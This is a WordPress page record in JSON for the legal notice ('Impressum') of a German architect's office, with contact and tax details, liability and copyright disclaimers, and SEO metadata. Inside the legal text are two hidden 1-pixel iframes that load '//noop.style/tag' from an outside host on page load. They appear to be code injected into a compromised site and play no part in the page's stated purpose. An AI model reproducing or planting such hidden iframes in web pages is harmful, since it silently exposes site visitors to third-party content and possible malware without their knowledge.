{"id":674,"date":"2025-08-01T15:32:47","date_gmt":"2025-08-01T15:32:47","guid":{"rendered":"https:\/\/www.mgrobe-architektur.de\/?page_id=674"},"modified":"2026-01-18T14:32:07","modified_gmt":"2026-01-18T13:32:07","slug":"__trashed-5","status":"publish","type":"page","link":"https:\/\/www.mgrobe-architektur.de\/?page_id=674","title":{"rendered":"Impressum"},"content":{"rendered":"<div id=\"pl-674\"  class=\"panel-layout\" ><div id=\"pg-674-0\"  class=\"panel-grid panel-has-style\" ><div class=\"siteorigin-panels-stretch panel-row-style panel-row-style-for-674-0\" data-stretch-type=\"full-width-stretch\" ><div id=\"pgc-674-0-0\"  class=\"panel-grid-cell panel-grid-cell-empty\" ><\/div><div id=\"pgc-674-0-1\"  class=\"panel-grid-cell\" ><div id=\"panel-674-0-1-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" ><div class=\"panel-widget-style panel-widget-style-for-674-0-1-0\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<div class=\"row\">\n<div class=\"max\"><span class='mb-center maxbutton-5-center'><span class='maxbutton-5-container mb-container'><a class=\"maxbutton-5 maxbutton maxbutton-1\" title=\"Architektur\" href=\"\/?page_id=277\"><span class='mb-text'>Architektur<\/span><\/a><\/span><\/span><\/div>\n<div class=\"max\"><span class='mb-center maxbutton-2-center'><span class='maxbutton-2-container mb-container'><a class=\"maxbutton-2 maxbutton maxbutton-2\" title=\"Brandschutz\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=755\"><span class='mb-text'>Brandschutz<\/span><\/a><\/span><\/span><\/div>\n<div class=\"max\"><span class='mb-center maxbutton-3-center'><span class='maxbutton-3-container mb-container'><a class=\"maxbutton-3 maxbutton maxbutton-3\" title=\"\u00dcber Uns\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=753\"><span class='mb-text'>\u00dcber Uns<\/span><\/a><\/span><\/span><\/div>\n<div class=\"max\"><span class='mb-center maxbutton-4-center'><span class='maxbutton-4-container mb-container'><a class=\"maxbutton-4 maxbutton maxbutton-4\" title=\"Kontakt\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=757\"><span class='mb-text'>Kontakt<\/span><\/a><\/span><\/span><\/div>\n<\/div>\n<\/div>\n<\/div><\/div><\/div><\/div><div id=\"pgc-674-0-2\"  class=\"panel-grid-cell panel-grid-cell-mobile-last\" ><div id=\"panel-674-0-2-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"1\" ><div class=\"panel-widget-style panel-widget-style-for-674-0-2-0\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-898 alignleft\" src=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\" alt=\"Mg-Architektur\" width=\"1150\" height=\"250\" srcset=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png 1150w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383-300x65.png 300w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383-1024x223.png 1024w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383-768x167.png 768w\" sizes=\"auto, (max-width: 1150px) 100vw, 1150px\" \/><\/p>\n<\/div>\n<\/div><\/div><\/div><\/div><div id=\"pgc-674-0-3\"  class=\"panel-grid-cell panel-grid-cell-empty\" ><\/div><\/div><\/div><div id=\"pg-674-1\"  class=\"panel-grid panel-has-style\" ><div class=\"siteorigin-panels-stretch panel-row-style panel-row-style-for-674-1\" data-stretch-type=\"full-width-stretch\" ><div id=\"pgc-674-1-0\"  class=\"panel-grid-cell\" ><div id=\"panel-674-1-0-0\" class=\"so-panel widget widget_sow-headline panel-first-child panel-last-child\" data-index=\"2\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-headline so-widget-sow-headline-default-dcc4b020ac78-674\"\n\t\t\t\n\t\t><div class=\"sow-headline-container \">\n\t\t\t\t\t\t\t<h1 class=\"sow-headline\">\n\t\t\t\t\t\tImpressum\t\t\t\t\t\t<\/h1>\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"decoration\">\n\t\t\t\t\t\t<div class=\"decoration-inside\"><\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n<\/div><\/div><\/div><\/div><\/div><div id=\"pg-674-2\"  class=\"panel-grid panel-has-style\" ><div class=\"siteorigin-panels-stretch panel-row-style panel-row-style-for-674-2\" data-stretch-type=\"full-width-stretch\" ><div id=\"pgc-674-2-0\"  class=\"panel-grid-cell\" ><div id=\"panel-674-2-0-0\" class=\"so-panel widget widget_sow-image panel-first-child\" data-index=\"3\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-image so-widget-sow-image-default-8b5b6f678277-674\"\n\t\t\t\n\t\t>\n<div class=\"sow-image-container\">\n\t\t<img \n\tsrc=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Mit-Quadraten.png\" width=\"1500\" height=\"250\" srcset=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Mit-Quadraten.png 1500w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Mit-Quadraten-300x50.png 300w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Mit-Quadraten-1024x171.png 1024w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Mit-Quadraten-768x128.png 768w\" sizes=\"(max-width: 1500px) 100vw, 1500px\" title=\"Mg-Architektur Mit Quadraten\" alt=\"\" \t\tclass=\"so-widget-image\"\/>\n\t<\/div>\n\n<\/div><\/div><div id=\"panel-674-2-0-1\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"4\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<p><strong>Angaben gem\u00e4\u00df \u00a7 5 TMG<\/strong><\/p>\n<p>M.Sc.<br \/>\nMelanie Grobe<br \/>\nArchitektin<\/p>\n<p>Kleinbeckstra\u00dfe 9<br \/>\n45549 Sprockh\u00f6vel<\/p>\n<p><strong>Kontakt<\/strong><\/p>\n<p>Telefon: 02324 869 51 10<br \/>\nTelefax: 02324 869 51 08<br \/>\nE-Mail: info@grobe-architektur.de<\/p>\n<p>Steuernummer: 323\/5033\/4545<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Berufsbezeichnung und berufsrechtliche Regelungen<\/strong><\/p>\n<p>Berufsbezeichnung:\u00a0 \u00a0 \u00a0Architekt\/-in<br \/>\nZust\u00e4ndige Kammer:\u00a0 \u00a0Architektenkammer Nordrhein Westfalen (AKNW)<br \/>\nVerliehen durch:\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Architektenkammer Nordrhein Westfalen (AKNW)<br \/>\nEs gelten folgende berufsrechtliche Regelungen: Gesetze Verordnungen und Landesbauordnung NRW<br \/>\nRegelungen einsehbar unter:<br \/>\n<a href=\"http:\/\/www.aknw.de\/mitglieder\/recht-und-gesetze\/gesetze-und-verordnungen\/\">Gesetze Verordnungen<\/a><br \/>\n<a href=\"http:\/\/www.vordruckverlag.de\/lbo\/nw1.pdf\" target=\"_blank\" rel=\"noopener\">Landesbauordnung NRW<\/a><\/p>\n<p>Verantwortlich f\u00fcr den Inhalt nach \u00a7 55 Abs. 2 RStV<\/p>\n<p>M.Sc<br \/>\nMelanie Grobe<br \/>\nKleinbeckstra\u00dfe 9<br \/>\n45549 Sprockh\u00f6vel<\/p>\n<p>Wir sind nicht bereit oder verpflichtet, an Streitbeilegungsverfahren vor einer Verbraucherschlichtungsstelle teilzunehmen.<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<\/div>\n<\/div><\/div><\/div><div id=\"pgc-674-2-1\"  class=\"panel-grid-cell\" ><div id=\"panel-674-2-1-0\" class=\"so-panel widget widget_sow-headline panel-first-child\" data-index=\"5\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-headline so-widget-sow-headline-default-ec1eb4cebc48-674\"\n\t\t\t\n\t\t><div class=\"sow-headline-container \">\n\t\t\t\t\t\t<div class=\"decoration\">\n\t\t\t\t\t\t<div class=\"decoration-inside\"><\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n<\/div><\/div><div id=\"panel-674-2-1-1\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"6\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<p>&nbsp;<\/p>\n<h3>Haftung f\u00fcr Inhalte<\/h3>\n<p>Als Diensteanbieter sind wir gem\u00e4\u00df \u00a7 7 Abs.1 TMG f\u00fcr eigene Inhalte auf diesen Seiten nach den allgemeinen Gesetzen verantwortlich. Nach \u00a7\u00a7 8 bis 10 TMG sind wir als Diensteanbieter jedoch nicht verpflichtet, \u00fcbermittelte oder gespeicherte fremde Informationen zu \u00fcberwachen oder nach Umst\u00e4nden zu forschen, die auf eine rechtswidrige T\u00e4tigkeit hinweisen.<\/p>\n<p>Verpflichtungen zur Entfernung oder Sperrung der Nutzung von Informationen nach den allgemeinen Gesetzen bleiben hiervon unber\u00fchrt. Eine diesbez\u00fcgliche Haftung ist jedoch erst ab dem Zeitpunkt der Kenntnis einer konkreten Rechtsverletzung m\u00f6glich. Bei Bekanntwerden von entsprechenden Rechtsverletzungen werden wir diese Inhalte umgehend entfernen.<\/p>\n<h3>Haftung f\u00fcr Links<\/h3>\n<p>Unser Angebot enth\u00e4lt Links zu externen Websites Dritter, auf deren Inhalte wir keinen Einfluss haben. Deshalb k\u00f6nnen wir f\u00fcr diese fremden Inhalte auch keine Gew\u00e4hr \u00fcbernehmen. F\u00fcr die Inhalte der verlinkten Seiten ist stets der jeweilige Anbieter oder Betreiber der Seiten verantwortlich. Die verlinkten Seiten wurden zum Zeitpunkt der Verlinkung auf m\u00f6gliche Rechtsverst\u00f6\u00dfe \u00fcberpr\u00fcft. Rechtswidrige Inhalte waren zum Zeitpunkt der Verlinkung nicht erkennbar.<\/p>\n<p>Eine permanente inhaltliche Kontrolle der verlinkten Seiten ist jedoch ohne konkrete Anhaltspunkte einer Rechtsverletzung nicht zumutbar. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Links umgehend entfernen.<\/p>\n<h3>Urheberrecht<\/h3>\n<p>Die durch die Seitenbetreiber erstellten Inhalte und Werke auf diesen Seiten unterliegen dem deutschen Urheberrecht. Die Vervielf\u00e4ltigung, Bearbeitung, Verbreitung und jede Art der Verwertung au\u00dferhalb der Grenzen des Urheberrechtes bed\u00fcrfen der schriftlichen Zustimmung des jeweiligen Autors bzw. Erstellers. Downloads und Kopien dieser Seite sind nur f\u00fcr den privaten, nicht kommerziellen Gebrauch gestattet.<\/p>\n<p>Soweit die Inhalte auf dieser Seite nicht vom Betreiber erstellt wurden, werden die Urheberrechte Dritter beachtet. Insbesondere werden Inhalte Dritter als solche gekennzeichnet. Sollten Sie trotzdem auf eine Urheberrechtsverletzung aufmerksam werden, bitten wir um einen entsprechenden Hinweis. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Inhalte umgehend entfernen.<\/p>\n<\/div>\n<\/div><\/div><\/div><\/div><\/div><div id=\"pg-674-3\"  class=\"panel-grid panel-no-style\" ><div id=\"pgc-674-3-0\"  class=\"panel-grid-cell\" ><div id=\"panel-674-3-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"7\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<h2 style=\"text-align: center;\">Haftung f\u00fcr Inhalte<\/h2>\n<p style=\"text-align: left;\">Als Diensteanbieter sind wir gem\u00e4\u00df \u00a7 7 Abs.1 TMG f\u00fcr eigene Inhalte auf diesen Seiten nach den allgemeinen Gesetzen verantwortlich. Nach \u00a7\u00a7 8 bis 10 TMG sind wir als Diensteanbieter jedoch nicht verpflichtet, \u00fcbermittelte oder gespeicherte fremde Informationen zu \u00fcberwachen oder nach Umst\u00e4nden zu forschen, die auf eine rechtswidrige T\u00e4tigkeit hinweisen.<\/p>\n<p style=\"text-align: left;\">Verpflichtungen zur Entfernung oder Sperrung der Nutzung von Informationen nach den allgemeinen Gesetzen bleiben hiervon unber\u00fchrt. Eine diesbez\u00fcgliche Haftung ist jedoch erst ab dem Zeitpunkt der Kenntnis einer konkreten Rechtsverletzung m\u00f6glich. Bei Bekanntwerden von entsprechenden Rechtsverletzungen werden wir diese Inhalte umgehend entfernen<\/p>\n<\/div>\n<\/div><\/div><\/div><\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>Architektur Brandschutz \u00dcber Uns Kontakt Impressum Angaben gem\u00e4\u00df \u00a7 5 TMG M.Sc. Melanie Grobe Architektin Kleinbeckstra\u00dfe 9 45549 Sprockh\u00f6vel Kontakt Telefon: 02324 869 51 10 Telefax: 02324 869 51 08 E-Mail: info@grobe-architektur.de Steuernummer: 323\/5033\/4545 &nbsp; Berufsbezeichnung und berufsrechtliche Regelungen Berufsbezeichnung:\u00a0 \u00a0 \u00a0Architekt\/-in Zust\u00e4ndige Kammer:\u00a0 \u00a0Architektenkammer Nordrhein Westfalen (AKNW) Verliehen durch:\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Architektenkammer [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-674","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Impressum - MG Architektur<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=674\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Impressum - MG Architektur\" \/>\n<meta property=\"og:description\" content=\"Architektur Brandschutz \u00dcber Uns Kontakt Impressum Angaben gem\u00e4\u00df \u00a7 5 TMG M.Sc. Melanie Grobe Architektin Kleinbeckstra\u00dfe 9 45549 Sprockh\u00f6vel Kontakt Telefon: 02324 869 51 10 Telefax: 02324 869 51 08 E-Mail: info@grobe-architektur.de Steuernummer: 323\/5033\/4545 &nbsp; Berufsbezeichnung und berufsrechtliche Regelungen Berufsbezeichnung:\u00a0 \u00a0 \u00a0Architekt\/-in Zust\u00e4ndige Kammer:\u00a0 \u00a0Architektenkammer Nordrhein Westfalen (AKNW) Verliehen durch:\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Architektenkammer [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mgrobe-architektur.de\/?page_id=674\" \/>\n<meta property=\"og:site_name\" content=\"MG Architektur\" \/>\n<meta property=\"article:modified_time\" content=\"2026-01-18T13:32:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1150\" \/>\n\t<meta property=\"og:image:height\" content=\"250\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data1\" content=\"4\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=674\",\"url\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=674\",\"name\":\"Impressum - MG Architektur\",\"isPartOf\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=674#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=674#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\",\"datePublished\":\"2025-08-01T15:32:47+00:00\",\"dateModified\":\"2026-01-18T13:32:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=674#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mgrobe-architektur.de\/?page_id=674\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=674#primaryimage\",\"url\":\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\",\"contentUrl\":\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\",\"width\":1150,\"height\":250,\"caption\":\"Mg-Architektur\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=674#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\/\/www.mgrobe-architektur.de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Impressum\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/#website\",\"url\":\"https:\/\/www.mgrobe-architektur.de\/\",\"name\":\"MG Architektur\",\"description\":\"Architekten &amp; Ingenieure\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mgrobe-architektur.de\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Impressum - MG Architektur","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.mgrobe-architektur.de\/?page_id=674","og_locale":"de_DE","og_type":"article","og_title":"Impressum - MG Architektur","og_description":"Architektur Brandschutz \u00dcber Uns Kontakt Impressum Angaben gem\u00e4\u00df \u00a7 5 TMG M.Sc. Melanie Grobe Architektin Kleinbeckstra\u00dfe 9 45549 Sprockh\u00f6vel Kontakt Telefon: 02324 869 51 10 Telefax: 02324 869 51 08 E-Mail: info@grobe-architektur.de Steuernummer: 323\/5033\/4545 &nbsp; Berufsbezeichnung und berufsrechtliche Regelungen Berufsbezeichnung:\u00a0 \u00a0 \u00a0Architekt\/-in Zust\u00e4ndige Kammer:\u00a0 \u00a0Architektenkammer Nordrhein Westfalen (AKNW) Verliehen durch:\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Architektenkammer [&hellip;]","og_url":"https:\/\/www.mgrobe-architektur.de\/?page_id=674","og_site_name":"MG Architektur","article_modified_time":"2026-01-18T13:32:07+00:00","og_image":[{"width":1150,"height":250,"url":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Gesch\u00e4tzte Lesezeit":"4\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=674","url":"https:\/\/www.mgrobe-architektur.de\/?page_id=674","name":"Impressum - MG Architektur","isPartOf":{"@id":"https:\/\/www.mgrobe-architektur.de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=674#primaryimage"},"image":{"@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=674#primaryimage"},"thumbnailUrl":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","datePublished":"2025-08-01T15:32:47+00:00","dateModified":"2026-01-18T13:32:07+00:00","breadcrumb":{"@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=674#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mgrobe-architektur.de\/?page_id=674"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=674#primaryimage","url":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","contentUrl":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","width":1150,"height":250,"caption":"Mg-Architektur"},{"@type":"BreadcrumbList","@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=674#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.mgrobe-architektur.de\/"},{"@type":"ListItem","position":2,"name":"Impressum"}]},{"@type":"WebSite","@id":"https:\/\/www.mgrobe-architektur.de\/#website","url":"https:\/\/www.mgrobe-architektur.de\/","name":"MG Architektur","description":"Architekten &amp; Ingenieure","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mgrobe-architektur.de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"}]}},"_links":{"self":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages\/674","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=674"}],"version-history":[{"count":20,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages\/674\/revisions"}],"predecessor-version":[{"id":746,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages\/674\/revisions\/746"}],"wp:attachment":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=674"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}